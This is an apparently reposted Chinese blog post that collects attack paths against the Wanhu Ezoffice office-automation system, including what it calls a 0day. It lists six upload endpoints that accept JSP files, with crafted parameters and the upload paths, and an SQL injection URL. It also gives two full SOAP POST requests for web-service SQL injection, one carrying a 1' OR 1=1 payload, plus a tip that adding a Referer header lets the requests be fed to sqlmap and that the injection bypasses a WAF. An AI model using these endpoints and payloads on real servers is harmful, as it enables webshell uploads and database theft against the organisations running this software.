万户Ezoffice 漏洞集合+0day

栏目: JSP · 发布时间: 7年前

内容简介:万户Ezoffice 漏洞集合+0day

老版本任意文件上传、Web Service SQLi、New Web Serivce SQLi

一、老版本的用户已经不多了

1、第一处上传点

/defaultroot/govezoffice/gov_documentmanager/senddocument_import.jsp

构造参数上传,构造fileType=jsp来完成上传。

利用第一处上传的表单,直接上传jsp文件;直接返回文件名,如图:(查看源代码)

文件在upload参数设置的“archives”: /defaultroot/upload/archives/

2、第二处上传点

/defaultroot/customize/formClassUpload.jsp

没有任何限制直接上传,上传后的文件名是原文件名。

存在 defaultroot/devform/customize/ 目录下 查看源代码看文件名

3、第三处上传点(鸡肋)

/defaultroot/public/jsp/smartUploadPic.jsp

利用第三处的构造参数截断URL和上传的文件名#需服务器支持URL允许存在空字节!文件上传存在 /defaultroot/upload/archives/

4、第四处上传点

/defaultroot/work_flow/jsFileUpload.jsp

后门!简直就是后门,只能上传jsp文件!∑(O_O;)

文件上传在: /defaultroot/devform/workflow/ 原上传文件名。

5、第五处上传点

/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0

文件位置 /defaultroot/upload/information/

6、第六处上传点

/defaultroot/public/jsp/multiuploadfile.jsp?path=sound&mode=add&fileName=fileName&saveName=soundSaveName&tableName=soundTableName&fileMaxSize=0&photos=null

文件位置: /defaultroot/upload/sound/

二、SQLi

/defaultroot/public/select_user/search_org_list.jsp?searchName=

三、老版本Web Service SQLi

/defaultroot/xfservices/DealFileWebService

POST包:

POST /defaultroot/xfservices/DealFileWebService HTTP/1.1
    Host: www.*..cn:7890
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: LocLan=zh_CN
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 567

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://com.whir.mobile/DealFileWebService">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:getUserByAccount>           <urn:userAccount>1</urn:userAccount>        </urn:getUserByAccount>     </SOAP-ENV:Body></SOAP-ENV:Envelope>

四、New Web Service SQLi

老版本看到Web Service存在 SQL 注入后,想着去看看最新的版本。但是访问 xfservices 直接跳转首页,找不到Web Serivce了。

就去找了一下开发手册看看,你猜怎么着~๑乛◡乛๑

在Web Service Editor手工测试的时候,测试出来了存在SQL注入。

后来在抓包的时候遇到了坑,无法通过浏览器和burp直接抓包。(╯—﹏—)╯(┷━━━┷ 无法抓包,怎么愉快的丢SQLmap?

就去看了看漏洞库关于web service的注入漏洞,看到了几个例子需要中转脚本?(⊙⊙?)

怎么办,我不会写中转脚本。(╥╯^╰╥)

然后通过AWVS的HTTP Editor功能才知道,原来是有Referfer验证。所以加入Referfer就可以抓POST包丢SQLMAP了~

之前wooyun的需要中转脚本的Web Service 注入同理。

so

POST包:

POST /defaultroot/services/ExchangeService HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 788
X-Requested-With: XMLHttpRequest
Referer: http://oa.*.*.cn:7001/defaultroot/services/ExchangeService?wsdl
Host: oa.*.*.cn:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://61.187.198.50:82/defaultroot/services/ExchangeService" xmlns:urn1="http://po.exchange.govezoffice.whir.com" xmlns:urn3="http://xml.apache.org/xml-soap">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <getExchangeUnitsByParameterAll>
         <unitLevel>1</unitLevel>
         <unitAccount>1' OR 1=1 -- </unitAccount>
         <orderBy>1</orderBy>
        </getExchangeUnitsByParameterAll>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

结果你猜怎么着,出来的是延时注入,surprise!!!还无视waf....嗷呜~ヾ(*´∇`)ノ

万户Ezoffice 漏洞集合+0day


以上所述就是小编给大家介绍的《万户Ezoffice 漏洞集合+0day》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

七周七语言

七周七语言

Bruce A.Tate / 巨成、戴玮、白明 / 人民邮电出版社 / 2012-5-8 / 59.00元

内容简介: 从计算机发展史早期的Cobol、Fortran到后来的C、Java,编程语言的家族不断壮大。除了这些广为人知的语言外,还涌现了Erlang、Ruby等后起之秀,它们虽被喻为小众语言,但因其独特性也吸引了为数不少的追随者。 Bruce A. Tate是软件行业的一名老兵,他有一个宏伟目标:用一本书的篇幅切中要害地探索七种不同的语言。本书就是他的成果。书中介绍了Ruby、Io、......一起来看看 《七周七语言》 这本书的介绍吧!

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具